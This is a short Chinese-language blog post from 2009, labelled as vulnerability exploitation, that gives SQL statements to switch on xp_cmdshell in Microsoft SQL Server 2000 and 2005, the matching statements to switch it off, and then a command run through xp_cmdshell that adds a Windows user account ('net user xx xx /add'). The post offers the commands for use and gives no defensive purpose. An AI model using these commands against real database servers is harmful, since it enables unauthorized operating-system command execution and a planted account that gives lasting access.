| 关键词: nbsp RECONFIGURE configure cmdshell EXEC sp advanced 面的 options show |
Submitted by 二少 on 2009, April 11, 4:13 PM. 【漏洞利用】 mssql2000 mssql2005 开启xp_cmdshell SQL代码 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 关闭一样.只是将上面的后面的那个"1"改成"0"就可以了. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE; 然后执行:EXEC [master].[dbo].[xp_cmdshell] 'cmd /c net user xx xx /add' |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|